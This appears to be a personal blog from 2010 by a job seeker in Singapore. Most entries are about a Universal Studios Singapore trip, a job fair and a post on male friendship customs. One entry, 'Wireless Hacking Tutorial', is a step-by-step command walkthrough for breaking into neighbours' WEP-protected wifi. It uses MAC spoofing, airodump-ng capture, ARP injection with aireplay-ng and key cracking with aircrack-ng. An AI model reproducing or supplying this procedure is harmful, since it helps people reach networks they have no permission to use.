Wednesday, March 31, 2010

Holding Hands for Man is not sign of "G", but it is a Friendship

This is a very interesting post that i want to share with all of my readers. It was inspired from one of the TV station here in Singapore that discuss these matter.

Whenever you went out, either you went to shop, or just sightseeing, you might saw girls were holding hands, and that was very normal to you.

But what happen if 2 grown-up man walking and holding hands together. What would you thinking in your mind? Definitely at first you will say "Ihhhh".. I would say the same thing as well.

But not for Indian (India People), you will often see they holding hands in public. To them that is called as friendship or male bonding, unrelated to any homosexual thing that you could think of.

The TV station showed they holding hands like you would with your girlfriend. They can hold each other hands while standing so close to each other. Sometimes they would share their food together. They even help feed their friend using their hands. The other friend would do the same back to him.

This post is not trying to offend India men in this world. But to tell people all around the world, that friendship can be expressed in any way you can. If girls could holding hands with each other at public places, why it would make a different opinion if 2 man are holding hands in public??

It is just a matter of human perception...

Enjoy the Post.... ^ ^

Sunday, March 28, 2010

Jobsdb Paperless JobFair 2010

Me and steward went to the job fair last friday, 26th March 2010. The advertisement on this job fair is amazing. With Resort World Sentosa and DBS offering more than 500 jobs to job seekers. And the queue was simply amazing, lots of applicants came to register and find a suitable job for them. Including me.. haha

The jobfair somehow looked cool when i have finished register my name. They give you something like card, and you need to scan the code to login to the system. That's one of their paperless strategy.

Somehow, when i entered the room, hall 6, i approached one of booth there.. With a very polite and nice sound, i asked the girl..

me: "Hi, Good Afternoon!! Do you have any openings for IT jobs in your company?"

Girl: "Hi, Good Afternoon! You are Singaporeans?"
me: "No"
girl: "PR?"
me: "no"
girl: "Oh, we are very sorry. Our company only looking for Singaporeans and PR only!! We are very sorry!!
me: "Oh, ok then. Thanks"

I was like ahhhhhhh.. So straight to the point.. HAHA.. This is what you all need to expect when looking for a job in other country. No PR no TALK!! - NPNT!!

We were wondering they provided few laptops around their booth, and when i saw the laptop with someone accessing it. I saw, they just looking at the jobs available in that booth, and click on apply button to apply for the job. This is what you called Paperless JobFair.

This is not different than you just sitting down in your room, looking at the laptop, open up Firefox, type in, and select which job you want. Accountancy, IT, Hospitality.

It seems that it was useless to go there that day. Think from another point of view (as what my friend Julie said, yes, i met her that day there):
1. There were 1000 people there applying the jobs.
2. The way you applying the job is the same like what you can do at home.
3. Compare to apply the job available in that Job Fair, it is much better to look at another company that were not listed on the jobfair. Why? Your chance of getting called is 1/1000.. HAHAHA

This is what i can share with you today. Enjoy

Thursday, March 25, 2010

Universal Studio Singapore - Part 2

My last story ended on The Lost World area, and now we are going to continue the story to the EGYPT.. Where the mummies are residing. The main attraction is the Revenge of The Mummy Ride. This place was really hot at the time we entered. Really makes you think like you are in Egypt.. haha

There are 2 anubis [i think it is anubis] standing very tall at the entrance of the Revenge of the Mummy Ride. In front of the anubis, there are lots of another statue kneel facing each other on the right and left side. The far end is another tall relic which is i think it is like a monument. 

Let's talk about the mummy ride. It was the most horrible and terrifying (to some people ride) i have ever rode before in my life. The way to the ride is also very long, we need to walk like 5-6 minutes before we can reach the ride because the place was made like a puzzle road. It made you take the long way instead of just making 1 straight line.

I was thinking, if it was on weekend, i think the queue will be amazing a lot.......

The ride was little bit different because the roller coaster can speed up, slow down, going backward suddenly. I was shocked when to coaster reverse so sudden, when we faced to a cracking wall, so instead of crashing to the wall, the ride was reversing back and it was made as if we fall down into a pit of hole. AMAZING feeling.. haha.

There are some REAL FIRE spits out from a hole. You can feel the heat from the coaster. Normally they will use a fake fire, but this is real, almost like every ride in Universal Studio is made real. And the terrifying part is, when the coaster went up and down, the area around you are very dark, almost totally dark, thus you cant see when the ride is going down or up.. Just surrender your heart to the ride.. haha

Overall, the ride was good. I cant believe it that i played that coaster after i had my lunch.. haha

Next we took a treasure ride, which was riding and old fashioned car going for 1 round. Nothing interesting and boring. IMHO.

Here are the pictures from the EGYPT Area

The Entrance to the EGYPT World

The Entrance to the Revenge of the Mummy

Revenge of the Mummy

The Relic from Far and Close

Next we move on to the Sci-fi City, where the biggest and famous attraction resides. The Battlestar Galatica Human and Cyclon.

The Human is the red colour while the cyclon is the blue colour roller coaster ride. The coaster was mix into 1 place as if the 2 coasters are going to collide with each other but in fact it wont happen. So dun worry.

The red one is famous because it is very fast, 90 km/h. It does not hestitate at all, even when the beginning of ride, it speed up so sudden to top, and go down so suddenly. I cant even shout when the ride was coming down after speeding up so sudden. It is as if the coaster were going to take off from the rail. DAMN..

It way too fast and ended so quickly. HAHA.. After the ride, i felt not so well, a bit dizzy and sweating because it was very hot outside. My auntie asked me if i want to ride the blue one, and totally go against it. haha..

The blue rail is famous for its cobra roll, vertical loops and upside down rail. There are so many loops which made me dont want to ride. haha.. but to those who likes that kind of ride, you should ride it. You wont regret it. I can promise that.

After that continue to play Accelerator, something like spinning cup, but in futuristic design. I also din ride it because i get dizzy very quickly if i ride something that is spinning round and round.

These are the picture from Sci-fi City

The Entrance

THe Battlestar Galatica - Human and Cyclon

Me and the Ride. hoho

Closer Looks

The Logo

The Accelerator

The Sci-fi Cup

We move on to New York Area afterward. The building in here are really resemble lot to New York city, and there is Marylin Monroe in this area, but too bad never take picture with her.

Nothing much to explain in here, the attraction we got into were Steven Spielberg Special Effect Studio and Monster Rock Theater. 

Steven Spielberg attraction is amazing, you went into a building where they try to create a level 5 Tornado Warning. Everything was destroyed, from a big billboard falling down, speedboat crash into a small house, explosion, and a big ship coming close to where we stand as if it was going to crash us. When it almost crashed us, the stage where we were standing shaken to create the effect. It is very good. I have record the attraction but not so clear, scared caught by the staff. haha..

Monster Rock Theater was actually a rock musical theater feature dracula, mummy, werewolf, and so on. The old new york monster. They sang mostly rock songs. They even sang "Nobody but You" english version. haha.. I love the last song which was Bon Jovi It's My Life, You Give love a bad name.. I really enjoy the music..

There was 1 signature restaurant of classic new york city, whereby there were lots of classic cars parked outside the restaurant, and the design of the restaurant itself was classic. 

There was 1 group of break dance performing there. And my uncle's son was performing the dance itself. You can see it in the video below. FYI, he is only 3 years old now.

and here are the pictures from New York Area, as well as some random picture taken when the Universal Studio was closing down.

 The Old Stylish Building

Going Inside the Building

New York Street

American Food

The Palace

New York Old Restaurant

 With BreakDance Group

 Monster Rock Theatre

 Water World, taking photos with the Casts

 Water World

 Yeah, I get an OSCAR for............ [read it urself] 

And that is all for the trip to Universal Studio..

Enjoy the story.............................

Tuesday, March 23, 2010

Wireless Hacking Tutorial

So, everyone knows about wireless connection / wifi around their neighbourhood. Some of them are not secured at all, in which make this tutorial useless. Read more if you want to understand how it worksOK, when u tried to connect to Wifi around your neighbourhood, some of them are security protected.

Types of wireless security found in router nowadays:
1. WEP [ Wired Equivalent Privacy ] – This is the weakest security that protect a wireless connection from being hacked by professional or amateur hacker.
2. WPA+PSK [ Wifi Protected Access + PreShared Key ] – This is currently the strongest security that can be applied to your wireless connection. Some said that these can be hacked, but require much time to accomplish.

So, basically this tutorial is going to teach you on how to hack Wifi connection with WEP protected. How to identify the security? easy, just hover to the wireless connection, and it will show you what kind of security it has.

In order to follow this tutorial, you must have at least backtrack 3 installed in your machine. You can get the latest backtrack version here [Latest version is Backtrack 4 Final Release]
Ok, this tutorial used backtrack 3 to accomplish the hacking session.

1. Open up a shell command, by clicking the little blackbox next to the start button
2. First thing to do is stop our wireless card, type this in the shell command
* airmon-ng stop wlan0 —> do check what is your wireless device by typing iwconfig in the shell command, in my case, my wireless device in wlan0.
* Now put the wireless card down to make a fake mac address
Type : ifconfig wlan0 down
* Now change the mac address
Type : macchanger -mac 00:11:22:33:44:55 wlan0
* Start the wireless card
Type : airmon-ng start wlan0
3. Now let’s start looking for AP [Access Point]
Type : airodump-ng wlan0
4. After you see the AP’s lists on the left side.  Copy the BSSID or write down on a paper. Example : 00:1c:23:41:34
5. Open another shell
Type : airodump-ng -c 6 -w WIFIHACK -bssid 00:1c:23:41:34 wlan0
“take a look at data. If the number is keep going at the first time you use the airdump-ng, means you do not need to inject it with ARP. But if the number is very slowly increasing, you need to inject it with ARP”
6. Open another shell again, this time we are going to create more data with ARP Injection, so we don’t have to wait for the data to come to us, but we make it to come to us.
Type in the new shell : aireplay-ng -l 0 -a 00:1c:23:41:34 -h 00:11:22:33:44:55 wlan0
7. Inject the router in a new shell again
Type : aireplay-ng -3 -b 00:1c:23:41:34 -h 00:11:22:33:44:55 wlan0
8. Processes number 6 and 7 takes a while to actually inject. Check the data in process number 5, if the “data” is increasing rapidly means the injection is success.
9. Wait for the data to be around 100k and above, and you can start cracking the key
Type in new shell : aircrack-ng -n 64 -bssid 00:1c:23:41:34 WIFIHACK-01.cap
Once you crack it down, write the password down on a paper.
It will looks like this when it is cracked with aircrack : 11:CD:21:92:34
but when you type in the password, type: 11CD219234

Universal Studio Singapore Trip [Part 1]

I have been stressing myself with no calls from all of the company here in Singapore.. I am not sure why, but i do believe that i have the skills to do the job.

Well, to relieve some stress, i went to Universal Studio Singapore which is still in Soft Opening. I went there together with my uncle's family. We bought the ticket online, as what has been suggested by Resort World website. As they afraid there are might no tickets left when you to buy it on spot.

And so, the Ticket Entrance fee is SGD 66 on weekeday, which includes all the rides except for rock climbing in lost world.

There are 7 different areas to explore. Journey Starts from Hollywood area, after that you go either Madagaskar or New York. The rest are Far Far Away Kingdom (Shrek), The Lost World (Jurassic Park), Egypt, Sci-fi City.

We went there by bus from Vivo City, cost SGD 2, while train cost SGD 3. We arrived on Resort World B1 Carpark which is closed to the Casino.

Resort World Casino Entrance for Foreigners

Me and My Uncle's Son

The Universal Studio is on the first floor and we were welcomed by the Universal Studio Signature's Globe.


The Entrance

First Area is New York, coz we arrived at 9am, there were not much to see in this area. Meet woody wood pecker in this area.

Me n Woody Wood Pecker

After that we went to Madagaskar Area, and took some pictures there. Only King Julian Beach Party Go Round is available at the moment. So we took a ride there as our first ride..

Here are the photos on Madagaskar Area

The Big Tree

So Move the next Place, Shrek Kingdom. I love this place, we rode the mini roller coaster there, watched 4D Shrek which was amazing. It was actually a combination of 3D plus they tried to create the situation as if we were in the movie itself. For example: when the donkey sneeze to our face, water splashed on our face. When Shrek fly with the dragon, we can feel the wind, etc. Compare to the one in Genting, this 4D is way better.

We continue to Donkey Club Party show after that. This show was good in which we will entertain by the Donkey itself. But it is an animation, so dont expect real live donkey. It is good because it can talk and interact with us. When we said our name, the donkey will say Hi "our Name". IT is cool from my perspective.

Pictures from Shrek / Far Far Away

 FarFar Away Entrance

 FarFar Away Entrance
 Enchanted Airways - Mini Roller Coaster 

Welcome to Far Far Away

Princess Fiona's Castle

Princess Fiona's Castle

Princess Fiona's Castle

Shrek 4D Show

Ginger House

One of the Restaurant in Far Far Away

Souvenir Shop

The Frog Fountain

And then we move to the Lost World. We went straight to Jurassic Park and try the Canopy Ride, which is just 50 seconds ride.. So fast that you would think it is not worth the waiting as there are quite lots of people queuing for it. After that riding the Pterodactyl which is just go up and round.. Haha.. not really like ride like that. We want to try the Rapids Adventure which is a wet ride. The ride will take you on a watery environment while you see the dinosaurs. Something similar to the one in genting. But this ride will surely make you wet. The ride was not open at that time. So, we skipped this ride for later. Before that, i saw a girl holding a very big gun, and i was so interested with it. I borrowed it and took some pictures. The girl holding the gun is not bad either. haha..

After that, we having lunch at the Jurassic Discovery Centre aka The Lost World Food Court ^^, which is the same like the movie. The T-Rex bone are in the middle of this building. Having chicken rice which is not that good. It tastes just so so.

After that we want to watch Water World, but the show already started. It was 1215 when we reached there. We planned to watch it at 430 after failed to see the show.

And here are the pictures from the Lost World

The Lost World

Jurassic Park Entrance

Discovery Centre

Dino's Egg

The Canopy Ride

Water World Entrance

Inside Discovery - The TREX Skull

The Condition in Discovery


Me as Dino Hunter

Click HERE Continue to part 2.........................